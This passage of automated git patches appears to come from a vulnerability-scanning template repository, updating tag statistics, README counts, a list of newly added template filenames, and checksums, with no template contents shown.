1 | | | | | | | | | +| livejournal | 1 | | | | | | | | | +| oas | 1 | | | | | | | | | +| tmate | 1 | | | | | | | | | +| avid-community | 1 | | | | | | | | | +| slideshare | 1 | | | | | | | | | +| greatjoomla | 1 | | | | | | | | | +| maxum | 1 | | | | | | | | | +| motioneye | 1 | | | | | | | | | +| ispyconnect | 1 | | | | | | | | | +| myspreadshop | 1 | | | | | | | | | +| cartabandonmentpro | 1 | | | | | | | | | +| microservice | 1 | | | | | | | | | +| mercusys | 1 | | | | | | | | | +| chemotargets | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| quilium | 1 | | | | | | | | | +| postnews | 1 | | | | | | | | | +| defi | 1 | | | | | | | | | +| travel | 1 | | | | | | | | | +| neo4j | 1 | | | | | | | | | +| royal-elementor-addons | 1 | | | | | | | | | +| sqwebmail | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| surveysparrow | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| lokomedia | 1 | | | | | | | | | +| isg | 1 | | | | | | | | | +| jivesoftware | 1 | | | | | | | | | +| wftpserver | 1 | | | | | | | | | +| aspect | 1 | | | | | | | | | +| ldap-wp-login-integration-with-active-directory | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| dsr250 | 1 | | | | | | | | | +| scoreme_project | 1 | | | | | | | | | +| webnms | 1 | | | | | | | | | +| purethemes | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| webcontrol | 1 | | | | | | | | | +| fe | 1 | | | | | | | | | +| cloudfront | 1 | | | | | | | | | +| booked | 1 | | | | | | | | | +| multitime | 1 | | | | | | | | | +| game-debate | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| quttera | 1 | | | | | | | | | +| greenbone | 1 | | | | | | | | | +| disgomoji | 1 | | | | | | | | | +| revoked | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| ampjuke | 1 | | | | | | | | | +| carbonmade | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| jfa-go | 1 | | | | | | | | | +| tagdiv | 1 | | | | | | | | | +| orcusrat | 1 | | | | | | | | | +| skyrock | 1 | | | | | | | | | +| documentlocator | 1 | | | | | | | | | +| thanos | 1 | | | | | | | | | +| climatejusticerocks-mastodon-instance | 1 | | | | | | | | | +| sma1000 | 1 | | | | | | | | | +| chromecast | 1 | | | | | | | | | +| fabswingers | 1 | | | | | | | | | +| business-directory | 1 | | | | | | | | | +| forticlient | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| easy-wi | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| producthunt | 1 | | | | | | | | | +| loadmaster | 1 | | | | | | | | | +| slocum | 1 | | | | | | | | | +| workshop | 1 | | | | | | | | | +| voice123 | 1 | | | | | | | | | +| patton | 1 | | | | | | | | | +| insanejournal | 1 | | | | | | | | | +| itchio | 1 | | | | | | | | | +| luci | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| amprion | 1 | | | | | | | | | +| taskrabbit | 1 | | | | | | | | | +| picsart | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| averta | 1 | | | | | | | | | +| n-media-woocommerce-checkout-fields | 1 | | | | | | | | | +| pulsar360 | 1 | | | | | | | | | +| raspberry | 1 | | | | | | | | | +| authorstream | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| sms | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| portrait-archiv-shop | 1 | | | | | | | | | +| jspx | 1 | | | | | | | | | +| all-in-one-video-gallery | 1 | | | | | | | | | +| helmet | 1 | | | | | | | | | +| playtube | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| webclient | 1 | | | | | | | | | +| ab_google_map_travel_project | 1 | | | | | | | | | +| monitorr_project | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| sslmate | 1 | | | | | | | | | +| furtim | 1 | | | | | | | | | +| urls | 1 | | | | | | | | | +| avnil-pdf | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| inertialfate | 1 | | | | | | | | | +| eleanor | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| flock | 1 | | | | | | | | | +| ubigeo-peru | 1 | | | | | | | | | +| myblog | 1 | | | | | | | | | +| arkextensions | 1 | | | | | | | | | +| ionice | 1 | | | | | | | | | +| pireospay | 1 | | | | | | | | | +| powershell-universal | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| todoist | 1 | | | | | | | | | +| okru | 1 | | | | | | | | | +| xdebug | 1 | | | | | | | | | +| wishpond | 1 | | | | | | | | | +| ad_inserter_pro_project | 1 | | | | | | | | | +| espocrm | 1 | | | | | | | | | +| jejapl | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| node-red | 1 | | | | | | | | | +| costa | 1 | | | | | | | | | +| distcc | 1 | | | | | | | | | +| websitepanel | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | | davantis | 1 | | | | | | | | | -| pokemonshowdown | 1 | | | | | | | | | -| secure-donation | 1 | | | | | | | | | -| signal | 1 | | | | | | | | | -| hec | 1 | | | | | | | | | -| media-server | 1 | | | | | | | | | +| optimizingmatters | 1 | | | | | | | | | +| fortisiem | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| vip-blog | 1 | | | | | | | | | +| rconfig.exposure | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| wl-520gu | 1 | | | | | | | | | +| smart-manager-for-wp-e-commerce | 1 | | | | | | | | | +| nperf | 1 | | | | | | | | | +| boostifythemes | 1 | | | | | | | | | +| ds_store | 1 | | | | | | | | | +| app | 1 | | | | | | | | | +| libretoothgr-mastodon-instance | 1 | | | | | | | | | +| spreadsheet-reader | 1 | | | | | | | | | +| register | 1 | | | | | | | | | +| g_auto-hyperlink_project | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| talroo | 1 | | | | | | | | | +| diclosure | 1 | | | | | | | | | +| wimkin-publicprofile | 1 | | | | | | | | | +| mikejolley | 1 | | | | | | | | | +| websheets | 1 | | | | | | | | | +| apdisk | 1 | | | | | | | | | +| lychee | 1 | | | | | | | | | +| aquatronica | 1 | | | | | | | | | +| contest_gallery | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| cox | 1 | | | | | | | | | +| sync | 1 | | | | | | | | | +| dapp | 1 | | | | | | | | | +| aic | 1 | | | | | | | | | +| mediakits | 1 | | | | | | | | | +| mapping_multiple_urls_redirect_same_page_project | 1 | | | | | | | | | +| com_janews | 1 | | | | | | | | | +| awdsolution | 1 | | | | | | | | | +| vite | 1 | | | | | | | | | +| wpovernight | 1 | | | | | | | | | +| smartofficepayroll | 1 | | | | | | | | | +| golang | 1 | | | | | | | | | +| minds | 1 | | | | | | | | | +| expect | 1 | | | | | | | | | +| sahipro | 1 | | | | | | | | | +| geutebrueck | 1 | | | | | | | | | +| commoninja | 1 | | | | | | | | | +| web-access | 1 | | | | | | | | | +| musictraveler | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| bigfix | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| libre-office | 1 | | | | | | | | | +| systeminformation | 1 | | | | | | | | | +| clearbit | 1 | | | | | | | | | +| hytec | 1 | | | | | | | | | +| next-terminal | 1 | | | | | | | | | +| satis | 1 | | | | | | | | | +| selfcheck | 1 | | | | | | | | | +| calendar | 1 | | | | | | | | | +| o2oa | 1 | | | | | | | | | +| foursquare | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| ecommerce-product-catalog | 1 | | | | | | | | | +| abhinavsingh | 1 | | | | | | | | | +| nordpass | 1 | | | | | | | | | +| jhipster | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| htmlcoderhelper | 1 | | | | | | | | | +| setlistfm | 1 | | | | | | | | | +| jsonbin | 1 | | | | | | | | | +| secsslvpn | 1 | | | | | | | | | +| sugar | 1 | | | | | | | | | +| super-socializer | 1 | | | | | | | | | +| chuangtian | 1 | | | | | | | | | +| solikick | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| searchwp | 1 | | | | | | | | | +| ismygirl | 1 | | | | | | | | | +| hugegraph | 1 | | | | | | | | | +| mura-cms | 1 | | | | | | | | | +| siteeditor | 1 | | | | | | | | | +| crypto | 1 | | | | | | | | | +| multilaser | 1 | | | | | | | | | +| proxmox | 1 | | | | | | | | | +| 247sports | 1 | | | | | | | | | +| mcuuid-minecraft | 1 | | | | | | | | | +| psql | 1 | | | | | | | | | +| nice | 1 | | | | | | | | | +| arrayvpn | 1 | | | | | | | | | +| fsmlabs | 1 | | | | | | | | | +| yellowfin | 1 | | | | | | | | | +| ogugg | 1 | | | | | | | | | +| pronouny | 1 | | | | | | | | | +| nootheme | 1 | | | | | | | | | +| wpcentral | 1 | | | | | | | | | +| kopano | 1 | | | | | | | | | +| csh | 1 | | | | | | | | | +| jedox | 1 | | | | | | | | | | edgeos | 1 | | | | | | | | | -| trassir | 1 | | | | | | | | | -| colourlovers | 1 | | | | | | | | | +| ares | 1 | | | | | | | | | +| oceanwp | 1 | | | | | | | | | +| errorpage | 1 | | | | | | | | | +| instatus | 1 | | | | | | | | | +| admin-bypass | 1 | | | | | | | | | +| twittee-text-tweet | 1 | | | | | | | | | +| polygon | 1 | | | | | | | | | +| kadence-blocks | 1 | | | | | | | | | +| tup | 1 | | | | | | | | | +| ziahamza | 1 | | | | | | | | | +| layer5 | 1 | | | | | | | | | +| osghs | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| battlenet | 1 | | | | | | | | | +| codeforces | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ipanel | 1 | | | | | | | | | +| analytics-insights | 1 | | | | | | | | | +| trendmicro | 1 | | | | | | | | | +| akniga | 1 | | | | | | | | | +| fortnite-tracker | 1 | | | | | | | | | +| laurent_destailleur | 1 | | | | | | | | | +| lamp | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| wishlistr | 1 | | | | | | | | | +| cnvd2018 | 1 | | | | | | | | | +| db_backup_project | 1 | | | | | | | | | +| tracker | 1 | | | | | | | | | +| parler-archived-posts | 1 | | | | | | | | | +| rantli | 1 | | | | | | | | | +| pillowfort | 1 | | | | | | | | | +| ifw8 | 1 | | | | | | | | | +| mara_cms_project | 1 | | | | | | | | | +| wpexperts | 1 | | | | | | | | | +| envoy | 1 | | | | | | | | | +| amazon-web-services | 1 | | | | | | | | | +| gimp | 1 | | | | | | | | | +| bittube | 1 | | | | | | | | | +| cloudconvert | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| seatreg | 1 | | | | | | | | | +| weibo | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| johnsoncontrols | 1 | | | | | | | | | +| kiboit | 1 | | | | | | | | | +| mix | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| slant | 1 | | | | | | | | | +| reblogme | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| iiop | 1 | | | | | | | | | +| xinuos | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| tpot | 1 | | | | | | | | | +| txjia | 1 | | | | | | | | | +| bonobo | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| tumblr | 1 | | | | | | | | | +| supportivekoala | 1 | | | | | | | | | +| 3ware | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| wpmanageninja | 1 | | | | | | | | | +| a360inc | 1 | | | | | | | | | +| flyway | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| homedesign3d | 1 | | | | | | | | | +| wowhead | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| sshpass | 1 | | | | | | | | | +| utility | 1 | | | | | | | | | +| cube105 | 1 | | | | | | | | | +| bandcamp | 1 | | | | | | | | | +| bodybuildingcom | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| rc | 1 | | | | | | | | | +| wp-ecommerce | 1 | | | | | | | | | +| public_knowledge_project | 1 | | | | | | | | | +| base64-encoderdecoder | 1 | | | | | | | | | +| maianscriptworld | 1 | | | | | | | | | +| hestia | 1 | | | | | | | | | +| jh_404_logger_project | 1 | | | | | | | | | +| zope | 1 | | | | | | | | | +| debounce | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| meet-me | 1 | | | | | | | | | +| canal | 1 | | | | | | | | | +| chamsko | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| codologic | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| spiderflow | 1 | | | | | | | | | +| appsmith | 1 | | | | | | | | | +| viddler | 1 | | | | | | | | | +| muhttpd | 1 | | | | | | | | | +| idangero | 1 | | | | | | | | | +| automatisch | 1 | | | | | | | | | +| webcraftic | 1 | | | | | | | | | +| addon | 1 | | | | | | | | | +| mws | 1 | | | | | | | | | +| shoowbiz | 1 | | | | | | | | | +| kanev | 1 | | | | | | | | | +| motokiller | 1 | | | | | | | | | +| jvtwitter | 1 | | | | | | | | | +| unraid | 1 | | | | | | | | | +| yoast | 1 | | | | | | | | | | microsoft | 1 | | | | | | | | | -| idera | 1 | | | | | | | | | +| alltube_project | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| cracked | 1 | | | | | | | | | +| jpcert | 1 | | | | | | | | | +| pivotal_software | 1 | | | | | | | | | +| xegroup | 1 | | | | | | | | | +| 21buttons | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| stageshow_project | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| vlc-media | 1 | | | | | | | | | +| urbackup | 1 | | | | | | | | | +| ez | 1 | | | | | | | | | +| office | 1 | | | | | | | | | +| seber | 1 | | | | | | | | | +| cybelsoft | 1 | | | | | | | | | +| hd-network_real-time_monitoring_system_project | 1 | | | | | | | | | +| lightdash | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| jk | 1 | | | | | | | | | +| karma_project | 1 | | | | | | | | | +| qualcomm | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| tinder | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| cobbler_project | 1 | | | | | | | | | +| dasan | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| docebo | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| toolkit | 1 | | | | | | | | | +| skysa | 1 | | | | | | | | | +| speakout | 1 | | | | | | | | | +| kanich | 1 | | | | | | | | | +| najeebmedia | 1 | | | | | | | | | +| webtools | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 223d83e311..52872ce8f0 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | -| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | -| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | -| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | -| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | -| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 60 | | | | | -| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | +| cve | 2540 | dhiyaneshdk | 1334 | http | 7593 | info | 3780 | file | 402 | +| panel | 1163 | daffainfo | 864 | file | 402 | high | 1786 | dns | 25 | +| wordpress | 996 | dwisiswant0 | 803 | workflows | 191 | medium | 1560 | | | +| exposure | 955 | pussycat0x | 430 | network | 135 | critical | 1058 | | | +| xss | 913 | ritikchaddha | 366 | cloud | 134 | low | 268 | | | +| wp-plugin | 865 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | princechaddha | 303 | javascript | 60 | | | | | +| tech | 694 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 670 | ricardomaia | 238 | dns | 22 | | | | | +| misconfig | 660 | geeknik | 231 | dast | 22 | | | | | From 2b8ad371f7b3d1fce34248f7ae478df768e8149d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 12:16:04 +0000 Subject: [PATCH 0621/1841] Auto README Update [Tue Jun 25 12:16:04 UTC 2024] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 5941d08a8f..185e36d577 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | -| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | -| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | -| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | -| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | -| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 60 | | | | | -| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | +| cve | 2540 | dhiyaneshdk | 1334 | http | 7593 | info | 3780 | file | 402 | +| panel | 1163 | daffainfo | 864 | file | 402 | high | 1786 | dns | 25 | +| wordpress | 996 | dwisiswant0 | 803 | workflows | 191 | medium | 1560 | | | +| exposure | 955 | pussycat0x | 430 | network | 135 | critical | 1058 | | | +| xss | 913 | ritikchaddha | 366 | cloud | 134 | low | 268 | | | +| wp-plugin | 865 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | princechaddha | 303 | javascript | 60 | | | | | +| tech | 694 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 670 | ricardomaia | 238 | dns | 22 | | | | | +| misconfig | 660 | geeknik | 231 | dast | 22 | | | | | -**649 directories, 8828 files**. +**656 directories, 8984 files**. From f074faa25dcdebacf0a98ed367fef7c863837756 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 12:20:52 +0000 Subject: [PATCH 0622/1841] Auto Generated New Template Addition List [Tue Jun 25 12:20:51 UTC 2024] :robot: --- .new-additions | 164 ------------------------------------------------- 1 file changed, 164 deletions(-) diff --git a/.new-additions b/.new-additions index 38bc7b2df7..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,164 +0,0 @@ -cloud/aws/sns/sns-public-subscribe-access.yaml -cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml -cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml -cloud/kubernetes/deployments/k8s-default-namespace-used.yaml -cloud/kubernetes/deployments/k8s-host-ports-check.yaml -cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml -cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml -cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml -cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml -cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml -cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml -cloud/kubernetes/deployments/k8s-privileged-container.yaml -cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml -cloud/kubernetes/deployments/k8s-root-container-admission.yaml -cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml -cloud/kubernetes/kubernetes-code-env.yaml -cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml -cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml -cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml -cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml -cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml -cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml -cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml -cloud/kubernetes/pods/k8s-readonly-fs.yaml -cloud/kubernetes/pods/k8s-readonly-rootfs.yaml -cloud/kubernetes/pods/k8s-root-user-id.yaml -cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml -cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml -cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml -cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml -cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml -cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml -cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml -cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml -cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml -dast/vulnerabilities/sqli/time-based-sqli.yaml -file/malware/hash/anthem-deeppanda-malware-hash.yaml -file/malware/hash/applejeus-malware-hash.yaml -file/malware/hash/avburner-malware-hash.yaml -file/malware/hash/backwash-malware-hash.yaml -file/malware/hash/blackenergy-driver-amdide-hash.yaml -file/malware/hash/blackenergy-driver-malware-hash.yaml -file/malware/hash/blackenergy-killdisk-malware-hash.yaml -file/malware/hash/blackenergy-ssh-malware-hash.yaml -file/malware/hash/blackenergy-vbs-malware-hash.yaml -file/malware/hash/bluelight-malware-hash.yaml -file/malware/hash/bluetermite-emdivi-malware-hash.yaml -file/malware/hash/bluetermite-emdivi-sfx-hash.yaml -file/malware/hash/charmingcypress-malware-hash.yaml -file/malware/hash/cheshirecat-malware-hash.yaml -file/malware/hash/cloudduke-malware-hash.yaml -file/malware/hash/codoso-gh0st-malware.yaml -file/malware/hash/codoso-malware-hash.yaml -file/malware/hash/codoso-pgv-malware-hash.yaml -file/malware/hash/codoso-plugx-malware-hash.yaml -file/malware/hash/disgomoji-malware-hash.yaml -file/malware/hash/dubnium-malware-hash.yaml -file/malware/hash/dubnium-sshopenssl-malware-hash.yaml -file/malware/hash/emissary-malware-hash.yaml -file/malware/hash/evilbamboo-malware-hash.yaml -file/malware/hash/fakem-malware-hash.yaml -file/malware/hash/flipflop-malware-hash.yaml -file/malware/hash/furtim-malware-hash.yaml -file/malware/hash/gimmick-malware-hash.yaml -file/malware/hash/godzilla-webshell-hash.yaml -file/malware/hash/greenbug-malware-hash.yaml -file/malware/hash/ico-malware-hash.yaml -file/malware/hash/industroyer-malware-hash.yaml -file/malware/hash/ironPanda-htran-malware-hash.yaml -file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml -file/malware/hash/ironpanda-malware-hash.yaml -file/malware/hash/locky-ransomware-hash.yaml -file/malware/hash/minidionis-readerview-malware-hash.yaml -file/malware/hash/minidionis-vbs-malware-hash.yaml -file/malware/hash/naikon-apt-malware-hash.yaml -file/malware/hash/neuron2-malware-hash.yaml -file/malware/hash/oilrig-malware-hash.yaml -file/malware/hash/passcv-ntscan-malware-hash.yaml -file/malware/hash/passcv-sabre-malware-hash.yaml -file/malware/hash/passcv-signingcert-malware-hash.yaml -file/malware/hash/petya-ransomware-hash.yaml -file/malware/hash/poseidongroup-maldoc-malware-hash.yaml -file/malware/hash/poseidongroup-malware-hash.yaml -file/malware/hash/powerstar-malware-hash.yaml -file/malware/hash/purplewave-malware-hash.yaml -file/malware/hash/red-leaves-malware-hash.yaml -file/malware/hash/regeorg-webshell-hash.yaml -file/malware/hash/revil-ransomware-hash.yaml -file/malware/hash/rokrat-malware-hash.yaml -file/malware/hash/sauron-malware-hash.yaml -file/malware/hash/seaduke-malware-hash.yaml -file/malware/hash/sfx1-malware-hash.yaml -file/malware/hash/sfxrar-acrotray-malware-hash.yaml -file/malware/hash/sharpext-malware-hash.yaml -file/malware/hash/sofacy-Winexe-malware-hash.yaml -file/malware/hash/sofacy-bundestag-malware-hash.yaml -file/malware/hash/sofacy-fybis-malware-hash.yaml -file/malware/hash/tidepool-malware-hash.yaml -file/malware/hash/turla-malware-hash.yaml -file/malware/hash/unit78020-malware-hash.yaml -file/malware/hash/upstyle-malware-hash.yaml -file/malware/hash/wildneutron-malware-hash.yaml -http/cves/2021/CVE-2021-38146.yaml -http/cves/2021/CVE-2021-38147.yaml -http/cves/2021/CVE-2021-43831.yaml -http/cves/2021/CVE-2021-4436.yaml -http/cves/2023/CVE-2023-32068.yaml -http/cves/2023/CVE-2023-37645.yaml -http/cves/2023/CVE-2023-38194.yaml -http/cves/2023/CVE-2023-43472.yaml -http/cves/2023/CVE-2023-45136.yaml -http/cves/2023/CVE-2023-46732.yaml -http/cves/2023/CVE-2023-48241.yaml -http/cves/2023/CVE-2023-50719.yaml -http/cves/2023/CVE-2023-50720.yaml -http/cves/2023/CVE-2023-51449.yaml -http/cves/2023/CVE-2023-6505.yaml -http/cves/2023/CVE-2023-6786.yaml -http/cves/2024/CVE-2024-0250.yaml -http/cves/2024/CVE-2024-0939.yaml -http/cves/2024/CVE-2024-1728.yaml -http/cves/2024/CVE-2024-21650.yaml -http/cves/2024/CVE-2024-23692.yaml -http/cves/2024/CVE-2024-24112.yaml -http/cves/2024/CVE-2024-24565.yaml -http/cves/2024/CVE-2024-2621.yaml -http/cves/2024/CVE-2024-27718.yaml -http/cves/2024/CVE-2024-28995.yaml -http/cves/2024/CVE-2024-29824.yaml -http/cves/2024/CVE-2024-29895.yaml -http/cves/2024/CVE-2024-29973.yaml -http/cves/2024/CVE-2024-31750.yaml -http/cves/2024/CVE-2024-31982.yaml -http/cves/2024/CVE-2024-32113.yaml -http/cves/2024/CVE-2024-3274.yaml -http/cves/2024/CVE-2024-34982.yaml -http/cves/2024/CVE-2024-3552.yaml -http/cves/2024/CVE-2024-36412.yaml -http/cves/2024/CVE-2024-36527.yaml -http/cves/2024/CVE-2024-36837.yaml -http/cves/2024/CVE-2024-37393.yaml -http/cves/2024/CVE-2024-3922.yaml -http/cves/2024/CVE-2024-4443.yaml -http/default-logins/mantisbt/mantisbt-anonymous-login.yaml -http/exposed-panels/lorex-panel.yaml -http/exposed-panels/oracle-application-server-panel.yaml -http/exposed-panels/trellix-panel.yaml -http/exposed-panels/turnkey-lamp-panel.yaml -http/exposed-panels/veeam-backup-manager-login.yaml -http/exposed-panels/wildix-collaboration-panel.yaml -http/misconfiguration/apache/apache-server-status-localhost.yaml -http/misconfiguration/cookies-without-secure.yaml -http/technologies/apache-allura-detect.yaml -http/technologies/nperf-server-detect.yaml -http/technologies/wordpress/plugins/copy-delete-posts.yaml -http/technologies/wordpress/plugins/image-optimization.yaml -http/technologies/wordpress/plugins/royal-elementor-addons.yaml -http/technologies/wordpress/plugins/simple-history.yaml -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml -http/vulnerabilities/gradio/gradio-lfi.yaml -http/vulnerabilities/gradio/gradio-ssrf.yaml -http/vulnerabilities/other/fastadmin-lfi.yaml -network/detection/mikrotik-ssh-detect.yaml From 14ea4084a2859845e5c18e6f06f173f23c403acf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 12:20:58 +0000 Subject: [PATCH 0623/1841] Auto Generated Templates Checksum [Tue Jun 25 12:20:58 UTC 2024] :robot: --- templates-checksum.txt | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7761967b16..7a6f563ea0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:fd5611cd2a074075a7b62aa87ea892cef36731e8 +README.md:98bddb6b4dbb0865961b2194f708b03ea1c7a1c2 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:252ce84d9a78b8aa2f3c37a797658c62a96f4ab1 -TEMPLATES-STATS.md:492c7a2b30ad732f7cd5d8aa33b7def55b4b4213 -TOP-10.md:e6fbef9828cd278fee8b66c9a7f4754a6a724db6 +TEMPLATES-STATS.json:c6059846080f49ae10a66cecf51cbccc534786f4 +TEMPLATES-STATS.md:78b61fd6c62a52c0153c649fca26c0dff16d3a7e +TOP-10.md:4844aeabdab16b516603f50126c216b7b69c2743 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 @@ -1963,7 +1963,7 @@ 